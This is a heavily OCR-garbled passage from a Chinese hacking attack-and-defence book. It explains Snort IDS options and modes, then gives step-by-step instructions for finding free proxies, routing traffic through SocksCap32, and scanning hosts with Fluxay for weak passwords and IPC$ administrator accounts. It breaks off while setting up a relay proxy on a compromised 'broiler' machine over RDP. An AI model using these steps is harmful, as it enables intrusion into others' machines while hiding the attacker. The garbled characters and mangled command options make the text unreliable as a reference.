匹配 奉 找 采用 递归 法 进行 ， 检 测 机 制 只 针对 当前 已 经 建立 的 链表 选项 进行 检测 。 

3. 日 志 子 系统 

Snort 可 供 选 择 的 日 志 形 式 有 文本 形式 、 二 进 制 形 式 和 关闭 日 志 服 务 三 种 。 

4. 报警 子 系统 

报警 形式 有 五 种 : 报 沟 信息 可 发 往 系 统 ; 用 文本 形式 记录 到 报警 文件 中 去 ; 用 二 
进 制 形式 记录 到 报警 文件 中 去 ; 通过 Samba 和 WinPopup 信息 ; 天 财报 警 ， 什 么 也 不 做 。 





























0.6.2 lio0rt 命令 介绍 


虽然 已 出 现 了 Windows 平台 基于 Snort.exe a 图 形 窗 口 控 制程 序 idscenterexe， 但 
还 是 不 能 避免 使 用 命令 ， 下 面 详细 介绍 Snort 命令 及 其 参数 的 作用 。 
Snort 的 命令 行 的 通用 形式 为 :snort-[options]<filters>。 
各 个 参数 的 功能 如 下 。 
@ -A <alert>: 设置 报警 模式 ，alert = full/fast/none/unsock。 其 中 ，full 模式 是 默认 警报 
模式 ， 它 记录 标准 的 alert 模式 到 alert 文件 中 ; fast 模式 只 记录 时 间 惟 、 消 息 、IP 
地 址 、 闹 口 到 文件 中 ; unsock 模式 是 友 送 到 UNIX socket; none 模式 是 关闭 报警 。 
@ -b: 用 二 进 制 文 件 保 存 网 络 数据 包 ， 以 应 付 高 吞吐 量 的 网 络 。 
@ -B <mask>: 将 卫 地 址 信息 抹 揉 ， 去 隐私 化 。 
@ -c <cf>: 使 用 配置 文件 <cf>， 这 会 使 得 snort 进入 IDS 模式 ， 并 从 <c 他 中 读 取 运行 
的 配置 信息 。 
-d:， 显示 包 的 应 用 层 数据 。 
-D: 以 后 台 进 程 运行 snort。 如 无 指定 ，Alerts 将 与 到 /var/log/snort/alert。 
-e: 显示 数据 链 路 层 的 信息 。 
-E: 保存 报警 日 六 为 Windows 事件 日 志 。 
-f: 激活 PCAP 行 绥 冲 (Line Buffering )。 
-F <bpf>: 指定 BPF 过 滤 疾 。 
-g <gname>: 初始 化 Snort 后 以 组 ID (group ID ) 运行 。 
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全- 攻防 从 入 门 到 精通 
全 人 人 他 


-G <id>: 为 事件 生成 设置 一 个 基础 事件 id 值 。 

-h <hn>: 设置 本 地 网 络 为 hn， 如 192.168.1.0/24。 

-i<if>: 设置 网 络 接口 为 <if>。 可 以 用 -W 选项 查询 网 络 接口 列表 ， 然 后 用 接口 序号 
index 指定 接口 ， 如 -i2。 

-I: 报警 时 附加 上 接口 信息 。 

-J <port>: 当 以 in-line 模式 运行 时 ， 这 个 选项 将 只 捕获 <port 奖 口 的 报 文 。 

-k <checksum mode>: 设置 校 验 和 模式 为 all、noip、notcp、noudp、noicmp 或 none。 
-K <logging mode>: 设置 保存 文件 的 格式 为 pcap、ascii 或 none。 其 中 ，pcap 是 默 
认 格 式 ， 同 于 -b 选项 的 格式 ; ascii 是 老 的 模式 格式 ;none 则 关闭 数据 包 记 录 。 
-1<ld>: 设置 数据 包 文 件 存放 目录 <1d>。 默 认 目 录 是 /Var/log/snort. 

-<fn>: 设置 二 进 制 输出 文件 的 文件 名 为 <fn>。 

-M: 当 以 非 后 台 模 式 daemon 运行 时 ， 保 存 信息 到 syslog。 

-m <mask>: 设置 snort 输出 文件 的 权限 位 。 

-n <count>: 出 来 <count> 个 报 文 后 终止 程序 。 

-N: 关 财 保存 日 志 包 功能 。 

-0: 改变 应 用 规则 的 顺序 。 从 Alert 一 Pass 一 Log 顺序 改 为 Pass 一 Alert- 一 Log， 避 人 饭 
了 设置 大 量 BPF 命令 行 参 数 来 过 滤 alert 规则 。 

-90: 在 ASCII 数据 包 捕 获 醒 式 下 混 消 IP 地 址 。 

-p: 关闭 混杂 模式 。 

-P<snaplen>: 设置 snaplen， 默 认 值 是 当前 网 卡 的 MTU。 

-q: 安静 模式 ， 不 显示 标志 和 状态 报告 。 

-Q: 当 在 线 (in-line) 运行 时 ， 从 iptables/IPQ 中 旗 取 数据 包 。 

-fr<tf>: 从 pcap 格式 的 文件 中 读 取 数据 包 。 

-R <name>: 为 Snort pidfile 增加 下 标 。 

-s: 使 snort 把 报警 消息 发 送 到 syslog， 默 认 的 设备 是 LOG AUTHPRIV 和 
LOG _ ALERT。 可 以 修改 snort.conf 文件 修改 其 配置 。 

-S <n=v>: 将 变量 n 的 值 设 置 为 v。 

-t <chroot>: 初始 化 后 将 Snort 的 根 目 录 改 变 为 <chroot>。 

-T: 以 目 检 测 模式 局 动 Snort。 

-u<uname>: 初始 化 后 改变 Snort 的 UID。 

-U: 在 时 间 戳 上 用 UTC 时 间 代 替 本 地 时 间 。 

-Vv: 从 网 络 上 读 出 数据 包 然 后 显示 在 你 的 控制 台 上 。 

-V: 人 查看 版 本 号 并 退出 。 

-w: 如 果 运 行 在 802.11 网 中 ， 显 示 管 理 帧 。 

-W *WIN32 ONLY*: 列 出 可 以 网 络 接口 。 其 中 的 Index 或 Device Name 都 可 以 用 到 
-i 选项 中 。 

-X: 显示 包括 数据 链 路 层 的 原始 数据 包 。 

-y: 在 时 间 鹤 里 显示 年 份 。 

-Z <path>: 设置 性 能 监视 器 (perfmon) 跤 任 。 

-? : 帮助 信息 。 
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0.63 ”Snort 的 工作 模式 


Snort 拥有 3 种 工作 模式 ， 分 别 为 : 噢 探 鼠 模式 、 分 组 日 六 模式 与 网 络 入侵 检 测 模式 。 
1， 了 距 探 器 模式 
Snort 使 用 Libpcap 包 捕 获 库 ， 即 TCPDUMP 使 用 的 库 。 在 这 种 模式 下 ，Snort 使 用 网 
络 接口 的 混杂 模式 读 取 并 解析 共享 信道 中 的 网 络 分 组 。 访 模式 的 命令 如 下 。 
@ /snort-v: 在 屏幕 上 显示 TCP/IP 等 的 网 络 数据 包头 信息 。 
@ ./snort-vd: 显示 较 详 细 的 包括 应 用 层 的 数据 传输 信息 。 
@ ./Snort-vde: 显示 更 话 细 的 包括 数据 链 路 层 的 数据 信息 。 
2. 分 组 日 志 模 式 
如 条 要 把 这 些 数据 信息 记录 到 便 盘 上 并 指定 到 一 个 目录 中 , 残 需要 使 用 分 组 日 志 模 式 。 
该 模式 的 命令 如 下 。 
@ ./Snort-vde-l ./log: 把 Snort 抓 到 的 数据 链 路 层 、TCP/IP 报头 、 应 用 层 的 所 有 信息 存 
入 当前 文件 夹 的 log 目录 中 【如果 log 目录 存在 )。 
@ ./Snort-vde-l ./log -h 192.168.1.0/24: 记录 192.168.1.0/24 这 个 C 类 网 络 的 所 有 进 站 数 
据 包 信息 到 log 目录 中 ，log 目录 的 子 日 录 以 计算 机 的 IP 地 址 为 名 以 相互 区 别 。 
@ ./Snort-l ./log-b: 记录 Snort 抓 到 的 数据 包 并 以 TCPDUMP 二 进 制 的 格式 存放 到 log 
目录 中 ， 而 Snort 的 默认 日 志 形 式 是 ASCII 文本 格式 。ASCII 文本 格式 便于 阅读 ， 
将 二 进 制 的 格式 转化 为 ASCII 文本 格式 无 疑 会 加 重工 作 量 ， 上 所 以 在 高 速 的 网 络 中 ， 
由 于 数据 流量 太 大 ， 应 该 采用 二 进 制 的 格式 。 
@ ./Snort -dvr packet.log: 读 取 packet.log 日 六 中 的 信息 到 屏幕 上 。 
3. 网络 入 侵 检 测 模式 (NIDS) 
网 络 入 侵 检 测 模 式 是 用 户 最 党 用 到 的 模式 ， 是 用 户 需 要 掌握 的 重点 。 这 种 模式 其 实 泥 
合 了 咒 探 器 模式 和 分 组 日 志 模 式 ， 且 逢 要 载 入 规则 库 才 能 工作 。 
该 模式 的 命令 格式 为 : ./snort-vde-l ./log-h 192.168.1.0/24-c snort.conf。 
表示 载 入 配置 文件 snort.conf， 并 将 网 络 192.168.1.0/24 的 报警 信息 记录 到 ./log 中 去 。 
这 里 的 “snort.conf” 文 件 可 以 换 成 用 户 上 自己 的 配置 文件 ， 载 入 snort.conf 配置 文件 后 Snort 
将 会 应 用 设置 在 snort.conf 中 的 规则 去 判断 每 一 个 数据 包 以 及 性 质 。 如 果 没 有 用 参数 -1 指定 
日 志 存 放 目 录 ， 系统 默 认 将 报警 信息 放 入 /var/log/snort 目录 下 。 还 有 ， 如 果 用 户 没 有 记录 链 
路 层 数 据 的 需要 或 要 保持 Snort 的 快速 运行 ， 可 以 把 -v 和 -e 天 挥 。 
关于 网 络 入 侵 检测 模式 , 还 需要 注意 它 的 警报 输出 选项 , Snort 有 多 种 警报 的 输出 选项 ， 
其 命令 格式 为 : ./snort-A fast-l ./log-h 192.168.1.0/24-c snort.conf。 表 示 载 入 配置 文件 
snort.conf， 局 用 fast 警报 模式 ， 以 默认 ASCII 格式 将 网 络 192.168.1.0/24 的 报警 信息 记录 
到 ./log 中 去 。 这 里 的 fast 可 以 换 成 名]1 或 none 等 , 但 在 大 规模 高 速 网 络 中 最 好 用 fast 模式 。 
生命 令 格式 为 : ./snort-s-b-l ./log-h 192.168.1.0/24-c snort.conf， 则 表示 以 二 进 制 格式 
将 警报 发 送 给 syslog， 其 余 的 与 上 面 的 命令 一 样 。 需 要 注意 的 是 ， 警 报 的 输出 模式 虽然 有 6 
种 ， 但 用 参数 -A 设置 的 只 有 4 种 ， 其 余 的 syslog 用 参数 s，smb 模式 使 用 参数 M。 
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络 代 理 与 奶 蹊 技术 


为 了 更 好 地 隐藏 自己， 黑客 在 攻击 前 往往 会 先 找 一 些 管 理 员 水 平 不 高 的 网 

络 主机 作为 代理 服务 器 ， 再 通过 这 些 主 机 去 攻击 目标 计算 机 。 正 是 有 了 这 些 

代理 服务 器 ， 黑 客 行 踪 才 不 容易 被 发 现 ， 这 样 黑 客 也 就 可 以 肆 无 总 习 地 进行 
攻击 。 


O 代理 猎手 、SocksCap32 代理 工具 的 曝光 
范 远程 跳板 代理 攻击 
O 实战 IP 追踪 技术 


O 〇 O NeroTrace Pro 追踪 工具 的 使 用 





1 
网 络 代理 与 退 踊 技术 


10.1 | 代理 服务 器 软件 的 使 用 


代理 服务 器 可 用 于 局 域 网 计算 机 与 Internet 连接 时 共享 上 网 , 而 黑客 则 可 通过 代理 服务 
句 软 件 对 东台 计算 机 进行 扫描 ， 从 而 和 截获 目标 计算 机 的 重要 信息 ， 以 达到 目 己 入 侵 的 目的 。 











10.1.1 利用 “代理 锤 手 ” 找 代理 曝光 


代理 狂 手 是 一 玛 集 搜索 与 验证 于 一 映 的 软件 ， 可 以 快速 查找 网 络 上 的 人 免费 代理 。 其 主 
要 特点 为 : 文 持 多 网 址 段 、 多 端口 自动 查询 ， 文 持 自 动 验证 并 给 出 速度 评价 ;， 文 持 后 续 的 
时 间 预 测 ， 文 持 用 户 设置 最 大 连接 数 《〈 可 以 做 到 不 影响 其 他 网 络 程序 ) 并 运行 自动 查找 最 
新 版 本 ， 最 大 的 特点 是 搜索 速度 快 ， 最 快 可 以 在 十 几 分 钟 搜 完整 个 B 类 地 址 的 65 536 
J his 

1. 添加 搜索 任务 

在 代理 猪手 安装 完毕 后 ， 还 需要 添加 相应 的 搜索 任务 ， 有 具体 的 操作 步骤 曝光 如 下 。 




















STEP01: 启动 “代理 猎手 ” STEP02: 添加 搜索 任务 





搜索 结果 (R) “代理 调度 (U) “辅助 工具 (P) 窗口 (W) ”帮助 (H) 
号 ra 


代理 调度 列表 - 


L =a 放 安 由 | 3 0 主 
局 0 



































选择 “搜索 任务 ”>“ 添 加 任务 ”菜单 命令 。 选择 任务 类 型 。 单 击 “下 一 步 ”按钮 。 
STEP03: 地址 范围 设置 STEP04: 添加 搜索 IP 范围 





地 址 范围 类 型 : [起止 地 址 范围 "| 
i 起 始 地 址 : [ 182 166 1 0 


选取 已 定义 的 范围 主机 IP<- :或 名 查询 本 机 IF 地 址 











a 消 | | 
单 击 “ 添 加 ”按钮 ， 此 为 添加 IP 范 围 的 第 一 种 方法 。 设置 IP 地 址 范围 。 国 单 击 “ 确 定 " 按钮。 
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取 | 
攻防 从 入 门 到 精通 


;= > 





今 公 公公 
STEP05: 1P 地 址 范围 添加 成 功 STEP06: 预定 义 的 IP 地 址 范围 





已 定 ※ 的 TP 地 址 范围 
结束 地 址 备注 





地 址 范围 


沁 册 
主机 IF<- 计 或 名 | 


























《< 上 一步 @) | 下 一 步 ) >| 取消 | 帮助 | 








查看 已 添加 的 IP 单 击 “ 选 取 已 定义 ” 单 击 “ 添 加 ” 按钮 ， 此 为 添加 IP 地 址 范围 的 第 二 种 
地 址 范围 。 的 范围 ”按钮 。 方法 。 
STEP07: 添加 搜索 IP 地 址 范围 STEP08: 查看 已 定义 的 IP 地 址 范围 











地 址 范围 类 型 : 
起 始 地 址 : [92 166 1 0 
结束 地 址 : [192 .168 1 的 

地 址 范围 漳 明 : 














根据 实际 情况 设置 IP 地 址 范围 ， 国 单 击 ' 确 图 己 添加 的 IP 地 址 范围 。 国 单 击 “ 打 开 " 按 钮 。 

并 输入 相应 的 地 址 范围 说 明 。 定 ”按钮 。 

STEP09: 读 入 地 址 范围 STEP10: 返回 “已 定义 的 IP 地 址 范围 ” 
对 话 杠 








查找 范围 I): 





我 的 文档 (12) 














厂 以 只 读 方 式 打开 (ER) 


选 定 已 预 设 |P 地 单 击 “打开” 单 击 “ 使 用 ”按钮 ， 即 可 将 预 设 的 IP 地 址 范围 添加 
址 范围 的 文件 。 按钮 。 到 搜索 IP 地 址 范围 中 。 
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STEP11: 返回 “添加 搜索 任务 ”对 话 框 STEP12: 添加 疾 口 和 协议 


于 


地 址 范围 

选取 已 定义 的 范围 | 。 主机 IF 和 域名 “| ”查询 本 机 7? 地 址 | 

| 起 始 地 址 。 ”| 结束 地 址 
192.168.1.0 192.168. 1.88 | 傍 攻 

遇 除 | 


清除 








- 庙 口 和 协议 


_ 起 始 端口 结束 端口 协议 ”| 是 否 必 搜 | 选用 
| | 





























< 上 - 步 gj 下 - 步 om | 取消 | ”帮助 | 
单 击 “ 下 一 步 ” 按 钮 。 单 击 “ 添 加 ”按钮 。 
STEP13: 添加 端口 和 协议 STEP14: 查看 添加 的 端口 和 协议 


< 上 一 步 @)| 完成 | 取消 | 帮助 | 
































根据 实际 情况 单 击 “确定 " 按钮 。 
选择 端口 。 


单 击 “ 完 成 ”按钮 ， 完 成 搜索 任务 的 设置 。 
2. 设置 参数 
在 设置 了 搜索 的 卫 地 址 范围 之 后 ， 就 开始 搜索 了 ， 但 为 了 提高 搜索 效率 ， 有 必要 先 设 
置 代理 猎手 的 各 项 参数 。 
STEP01: 打开 “代理 猎手 ”窗口 STEP02: 参数 设置 





如 代理 猪手 
| 系统 GS) 搜索 任务 (D) ”搜索 结果 (R) 代理 调度 (U) ”辅助 工具 (P) 窗口 (W) “帮助 (H) 搜索 验证 设置 | 验证 数据 设置 | 代理 调度 设置 | 其 它 设置 | 
Q@ DB 上 Ga CE 
连接 超时 时 间 : 后 s 连接 超时 时 间 : J10 5 
几 任 务 | 搜索 结果 ”代理 调度 | 验证 超时 时 间 : Fo  ” s 验证 超时 时 间 : Fo  ” s 
- 下 二 并 发 连接 数目 : ”J100 J 并 发 连接 数目 : ”|100 | 


二 : 局域网 或 拨号 上 网 


本 找 | a , 
厂 通过 Pins 主 机 确认 网 络 通畅 。 。 主机 IP 地 址 厂 ， ， ， ”。 检查 | 


用 | 除 | 一 搜索 方法 
| 友 启用 先 Ping 后 连 的 机 制 并 发 数 里 : [io ”重复 次 数 : [ 


信用 
上 
i -其 它 设置 - 
| 状态 ”| 数据 蝇 | 时 间 特 性 | 人 EL | 0 

重 传 | 协议 插件 :| | vs] 设置 | 
和 拷贝 | 用 户 代理 Mozilla/4.0 (compatible; MSIE 4.01; Windows 98) "| 

































































> 3 后 | 
连接 192.168.0.255:10800( [| 总共 100 个 并 发 对 象 , 100 个 但 |S 12:33:30 |99%|E 12:36:01 |N 12:36:02 / 


选择 “系统 ”> “参数 设置 ”菜单 命令 。 在 “搜索 验证 设置 ”选项 卡 中 勾 选 “启用 先 Ping 
后 连 的 机 制 ” 复 选 框 以 提高 搜索 效率 。 
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代理 猎手 默认 的 搜索 、 
如 果 用 户 的 带宽 无 法 达到 ， 


> 
攻防 从 入 门 到 精通 





验证 和 Ping 的 并 发 数量 分 别 为 50、80 和 100， 
就 最 好 相应 地 减少 各 个 并 发 数量 ， 以 减轻 网 络 的 





STEPO3: 


验证 数据 设置 


搜索 验证 设置 ”验证 数据 设置 | 代理 调度 设置 | 其 它 设置 | 


- 验 址 数据 设置 





验证 资源 地 址 : 
验证 资源 参数 : 


Jeww. ysahoo. com 


[raheo ol 














STEPO4: 


代理 调度 设 


置 


搜索 验证 设置 | 验证 数据 设置 ”代理 调度 设置 | 其 它 设置 | 


一 代理 调度 参数 设置 





| 使 用 代理 调度 功能 
厂 允许 其 它 机 器 使 用 本 机 的 自动 测度 功能 


代理 调度 监听 端口 : [8080 
ly 启用 本 地 域名 解析 及 绎 冲 功能 








_ 代 用 度 范围 设置 - 
Jv 以 下 地 址 不 使 用 代理 服务 器 


地 址 类 型 “起 始 地 址 


| 添加 | 全 网 |  m 除 | 


| 结束 地 址 





IF 范围 192. 168.0.1 
IP 范 围 192. 168.1.0 





192. 168.0.88 
192. 168. 1. 255 











可 添加 、 修 改 和 删除 “验证 资源 地 址 ”及 其 参数 。 设置 代理 调度 参数 及 代理 调度 范围 等 选项 。 


STEP05: 其 他 设置 返回 主 界面 


STEP06: 
搜索 结果 (R) ”代理 凋 度 (U)” 回 助 工具 (P)” 窗口 (WM) 帮助 (H) 


| SD | 
D&Bg 


搜索 任务 | 搜索 结果 ”代理 调度 | 


搜索 验证 设置 | 验证 数据 设置 | 代理 调度 设置 ”其它 设置 | 

- 按 号 设置 搜索 验证 历史 
厂 使 用 拨号 网 络 了 断 线 自动 重 拨 保留 天 数 : 
ee -优化 最 大 网 络 连 接 数 0 不 需要 ) 一 
Rr 当前 值 : 厂 “过 原 | 
重 试 次 数 : 后 重 iit 时 间 间隔 : 六 秒 | | 最 优 值 : kk | 


-运行 参数 - 























代理 1 周 度 列表 


HE 验证 | 








厂 进入 Windows 自 动 运行 
厂 启动 时 自动 开始 搜索 
厂 启动 时 自动 验证 代理 调度 表 


厂 启动 时 最 小 化 
lv 最 小 化 时 隐藏 
厂 最 小 化 时 不 在 任务 条 显示 图 标 


一 地 | 
L 人 铀 | 
; — Ws | 


| 














任务 列表 一 一 


厂 搜索 验证 完毕 自动 弹出 
DI 自动 保存 时 显示 进度 条 | 状态 | 数据 量 | 时 间 特 性 ji 信 | 


lv 自动 检查 新 版 本 重 传 


lv 禁止 运行 多 个 代理 猎手 程序 
Jv 关闭 代理 措 手 时 弹出 确认 窗口 
克 搜索 时 定时 自动 保存 10 ”分钟 


厂 最 晚 关 机 时 间 [11:22:48 一 




















尝 渡 连接 192.16$.0.255:10800(t | 总 共 100 个 并 发 对 象 , 100 个 但 |S 12:33:30 |99%|E 12:36:01 |N 12:36:02 /y 


选择 “搜索 任务 ”> “开始 搜索 ”菜单 命令 ， 即 开 
始 搜索 设置 的 I|P 地 址 学 贰 


设置 拨号 、 搜 索 验 证 历史 、 运 行 
完成 后 单 击 “ 确 定 ”按钮 。 


参数 等 选项 ， 设 置 


3. 查看 搜索 结果 
在 搜索 完毕 之 后 ， 可 以 查看 搜索 的 结果 。 
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STEP01: 查看 搜索 结果 STEP02: 查看 代理 调度 





系统 (S) ”搜索 任务 (1 搜索 结果 (R) 代理 调度 (U) “辅助 工具 (P) 窗口 (W) ”帮助 (H) i 窗口 (W) ”帮助 (H) 


paDDaaGlaD bpQDaa 世 | 














搜索 任务 “搜索 结果 | 代理 调度 | 搜索 任务 | 搜索 结果 ”代理 调度 | 
一 搜索 结果 J 1 个 被 选中 ] 代理 调度 列表 
Y 人 时 | 调 R ^ 证 服务 如 品类 型 | 验证 汰 态 ”| 启用 























| 0 0| 0. ol20.0 | 
.0| 0.0|20.1 
3 0| 0.0|20.0 
|1075_|NTTP | 验证 超时 | 了 0.0l20.2 | 
IT 上 






































尝试 连接 192.168.1.15:14979(H | 总 共 100 个 并 发 对 象 100 个 位 |S 13:05:13 |52%|E 13:41:28 IN 13:24:25 尝试 连接 192 168.0.255:10800( [总共 100 个 并 发 对 象 100 个 位 |[S 12:33:30 |99%|E 123601 IN 12:36:02 / 
验证 状态 为 “Free” 的 代理 ， 即 为 可 以 使 用 的 代理 。 复制 可 用 的 代理 服务 器 ， 即 可 进行 自动 调度 了 , 多 个 
服务 器 。 代理 服务 器 有 利于 网 络 速度 的 提高 。 


1 ) 一 般 情 况 下 ， 验 证 状态 为 “Free” 的 代理 服务 器 很 少 ， 只 要 验证 状态 为 
“Good” 就 可 以 使 用 了 。 

2 ) 用 户 也 可 以 将 搜索 到 的 可 用 代理 服务 器 的 人 P 地 址 和 说 局 ， 输入 到 网 页 浏 
览 器 的 代理 服务 器 设置 选项 中 ， 就 可 以 通过 该 代理 服务 器 进行 网 上 冲浪 了 。 





10,1.2 ”用 SOCkSCap32 设置 动态 代理 上 曝光 


SocksCap32 代理 软件 是 一 蒜 基 于 Socks 协议 的 网 络 代 理 客 户 问 软件 ， 它 能 将 指定 软件 
的 任何 Winsock 调用 转换 成 Socks 协议 的 请 求 ， 并 发 送 给 指定 的 Socks 代理 服务 器 。 它 可 
用 于 使 基于 HITTP、FTP、Telnet 等 协议 的 软件 ， 通 过 Socks 人 车 接 到 目的 地 。 








SocksCap 32 
Version 2.40 2. 40-051231) 


因 宕 守 ， 本 软 人 C 


a 可 


a 


i 


he 

2 eT 其 它 区 服 的 游戏 。 网 
的 ; 3 . 

2 者 三 妈 妥 第 人 Foy YXZW Com 


热 


vv 
站 


。 我 








使 用 SocksCap32 软件 前 ， 需 要 先 有 一 个 Socks 的 代理 服务 器 (不 管 是 用 代理 猎手 找 出 
来 的 ， 还 是 从 各 个 代理 网 站 中 得 到 的 )。 目 前 ，SocksCap32 软件 可 以 通过 搜索 引擎 找到 其 
下 载 地 址 ， 并 将 其 下 载 到 本 地 磁盘 中 。 

1. 建立 应 用 程度 标识 

当 第 一 次 运行 SocksCap32 程序 时 , 将 显示 “SocksCap 许可 ”对 话 框 。 在 单 击 “ 接 
受 ” 按 钮 后 ， 才 能 进入 SocksCap32 的 主 窗口 。 
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让 攻防 从 入 门 到 精通 
靳 全 人 人 他 
建立 应 用 程序 标识 的 具体 操作 步骤 曝光 如 下 。 
STEP01: 打开 SocksCap32 主 窗口 STEP02: 新 建 应 用 程序 标识 项 


吐 SacksCap 控制 台 


| 
文件 (F) 查看 (V) 帮助 (H) 





i I 输入 新 建 标识 项 的 单 击 “ 浏 
名 称 。 览 ” 按钮 。 
STEP03: 选择 需要 代理 的 应 用 程序 STEP04: 返回 主 窗口 


查 范围 如 : | 几 SocksCap V2 "| 拓 全 国 * 


名 称 修改 日 期 
2013/12/18 15:( _ 
有 2008/4/25 9:57 
2006/9/7 16:35 
2013/12/18 14:: ~ 











定 需要 代理 的 应 用 程序 。 “打开 ” 查看 新 添加 的 应 用 程序 。 
按钮 。 


添加 的 应 用 程序 可 以 是 E-mail 工具 、FTP 工具 、Telnet 工具 ， 以 及 当今 最 
热门 的 联网 游戏 等 。 


2. 设置 选项 
设置 SocksCap32 选项 的 具体 操作 步骤 曝光 如 下 。 


STEP01: 打开 SocksCap32 的 主 窗口 STEP02: SocksCap 设置 





网 5ocksCap 控制 台 -mm SocksCap 设置 

SO0CKS 设置 | 直接 连接 | 日志 | 
三 站 定 你 的 SOCKS 址 并 1 请 
| 则 震 代 和 服务 器 地 址 并 选择 使 用 的 通讯 


服务 性 
S0CIS 服务 器 : [220. 47.7.27 端 “|io70 





Ss0CFKS 用 户 标 [administrator 


协 识 
| 六 SO0CES 版 本 4) 








选择 “文件 ” >“ 设置 ”菜单 命令 。 在 此 选项 卡 中 对 服务 器 及 协议 进行 设置 。 
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如 果 用 户 查 找 的 代理 服务 器 需要 用 户 名 
SocksCap32 Socks5 用 户 名 /车 而 验证 [2 和 密码 ， 且 已 获得 该 用 户 名 和 和 密码， 则 可 义 
ee Ni fi)》 选 “SocksCap 设置 ”对 话 框 中 的 “用 户 名 / 
sO0CKS5 密 码 : Fae be 密码 ?” 复 次 框 . = “用 户 /密码 ” 复 选 
«gocksCap32 Socks5 0 户 名 /密码 验证 ”对 话 

框 中 填 入 用 户 名 和 密码 。 





STEP03: 添加 直接 连接 的 IP 地 址 等 STEP04: 设置 直接 连接 的 应 用 程序 和 库 
SocksCap 设置 | SocksCap 设置 


sO0CKS 设置 ”直接 连接 | 日 志 | sO0CKS 设置 直接 连接 | 日 志 “| 
mp 二 所 向 于 请 让 委 当 埋 扩 二 扣 及 由 用 忠良 a 二 攻 靖 遇 村 半 二 由 当 相 这 搜 东 由 用 由 外 条 


直接 这 接 的 地 址 直接 芋 接 的 地 址 














应 用 心 ) 


添加 直接 连接 的 IP 地 址 , 也 可 输入 域名 , 也 可 单 击 ” 单 击 “ 添 加 ”按钮 添加 直接 连接 的 应 用 程序 。 在 

“添加 ”按钮 通过 IP 地 址 文件 来 添加 。 “SOCKS 版 本 5 直接 连接 的 UDP 端口 ”选项 组 中 可 

设置 直接 连接 的 UDP 端口 号 。 

STEP05: 设置 日 志 信息 
SocksCap 设置 

s0CIS 设置 | 直接 连接 日 志 | 

日 志 功 能 能 帮助 丛 断 巡 接 失 赂 的 原因 
“人 允许 日 志 ” 复 选 框 ， 设 置 完成 后 单 击 “ 确 
允许 日 志 加 ) 人 0 
日 志文 [sc32n6 7x7 
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售 人 他 他 


半 河 [ 





窜 


序 ， 选 择 “ 文 件 ”>“ 通 过 Socks 代理 运 


多 


攻防 从 入 门 到 精通 
在 设置 完 代 理 选 项 并 添加 了 代理 应 用 程序 后 ， 在 应 用 程序 列表 中 选取 需要 运行 的 应 用 程 























运行 ”菜单 命令 ， 即 可 局 动 该 应 用 程序 并 通过 代理 进 


行 登录 。 如 果 需 要 使 某 个 应 用 程序 通过 SocksCap32 代理 , 则 必须 通过 SocksCap32 进行 司 动 。 


10.1.3 防 江 远程 跳板 代理 攻击 








跳板 , 简单 来 说 , 就 是 黑客 为 了 隐藏 自己 的 地 址 , 寻找 别 的 机 器 作为 中 转 站 来 实现 入 侵 。 
黑客 使 用 远程 跳板 代理 攻击 ， 会 大 大 增加 妃 踪 难度 ， 从 而 使 别人 很 难得 找到 目 己 的 位 置 。 


1. 扫描 选择 目标 





这 里 曝光 的 工具 是 国内 “至 有 仇 省 ”的 流光 软件 ， 因 为 它 拥 有 特有 的 一 种 扫 摘 模式 : 





远程 扫描 模式 。 通 过 远程 “肉鸡 ”可 以 轻易 实现 扫描 远程 的 跳板 陈 扫描 。 


其 体 的 操作 步 又 如 下 。 


STEP01: 运行 “Fluxay” 软件 


图 小 榨 软 件 - [流光 5.0】 Build 3310 (442 用 户 ) 
文件 () ”编辑 (E) “ 坦 看 (V) | 探测 (R) ] 选项 (O) 工具 中 ED 关于 (A) 
探 出 记录 查找 :| 咏 ” 简单 模式 探测 (R).. Ctrl+F7 


口 . 目标 主机 加 
Et pOP3 主机 写 。 标 六 模式 探测 (tN… Ctrl+F5 











i | 日 - 回 192.168.1403 
: 日 -回电 0: 安 装 \ 

i f 回 芝 显示 | | 
| | Li 
”日 回 恩 0: 安装 \ 
回 区 显示 | 











二 


网 高 级 扫 手工 具 办 .. Ctrl+A 





| 策反 措 POP3/FTP/NT/SQL 主 机 (S). Ctrl+R | 








STEP02: 主机 扫描 设置 





开始 地 址 : ”1192.168.0.1 


结束 地 址 : |192.1658. 直 255 











扫 摘 主机 类 型 : 





因 | 常 用 密码 扫 摘 六 将 FrontPage 主 机 自动 加 入 HTTP 主 机 列表 











选择 “探测 ”>“ 扫 描 POP3/FTP/NT/SQL 主 机 ” 菜 ”图 输入 扫 措 范围 并 在 “ 扫 措 单 击 “ 确 定 ” 


文件 (月 ”编辑 (E) 吾 春 (V) 探 刘 (R) ”选项 (O) 工具 (T) 帮助 (H) 关于 (A) 

















:Com 
日 -回忆 p: 评 装 Fiuxa 
回 区 旺 未 所 及 自 
| -口吻 Map 主机 
日 回 爸 FP 主机 

| 9 四国 18.1 

日 - 回 明 0: 由 装 YFiuxayWame.dic 

| | -- 回 芯 显示 所 有 项 目 
日 - 回 192.168.0.10 
i 日 加 局 D: 巡 装 YFuxayWWame.dic 

“- 回 中 显示 所 有 项 目 


国 | 小 坎 软 件 实验 室 1995-2002 小 榕 作品 版 权 所 有 





Mi 
一 | 全 | [155/511 单词 075/080 探测 十 度 








主机 类 型 ”下 拉 列 表 框 中 选择 按钮 。 
“NT/98” 选 项 


STEP04: 查看 扫描 结果 


192., 168, 1, 100 :PORT : NT/98 


192.168.1.15 :PORT : NT/98 
192., 168,1,4: PORT : NT/98 
192, 168, 1, 10 :PORT : NT/38 











正在 扫描 ， 单 击 “ 人 和 停止” 按钮 可 中 断 扫描 。 查看 扫描 结果 ， 单 击 “ 确 定 ” 按 钮 关闭 该 对 话 框 。 
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STEP06: 1IPC 自动 探测 


IPC 自 动 探测 











是 百 在 成 功 获 得 用 户 名 后 立即 开始 简单 模式 探测 ? 





… 团 思 192.168.1 
口交 解码 字典 或 方案 
9 - 口 妖 探 出 历史 纪录 























在 “IPC$ 主 机 ”下 任 选 一 个 右 击 ， 从 快捷 菜单 中 选 ” 为 能 直接 获得 更 大 单 击 “ 是 " 按钮 。 
择 “ 探 测 ”> “探测 IPC$ 用 户 列表 ”菜单 命令 。 权限 ， 勾 选 该 复 选 项 。 


查看 在 目标 主机 下 探测 到 的 用 户 。 


… 回 图 192.168.1.55 
由 - 回 192.168.1.88 


品 - 回 国 192.158.1.100 
3 Administrator (Admin) 





2. 代理 跳板 的 案 设 

代理 架设 的 方法 很 徐 单 ， 具 体 的 操作 步骤 如 下 。 

1) 通过 3389 远程 登录 “肉鸡 ” 选择 “开始 ” 在 搜索 文本 框 中 输入 “cmd”， 即 可 进 
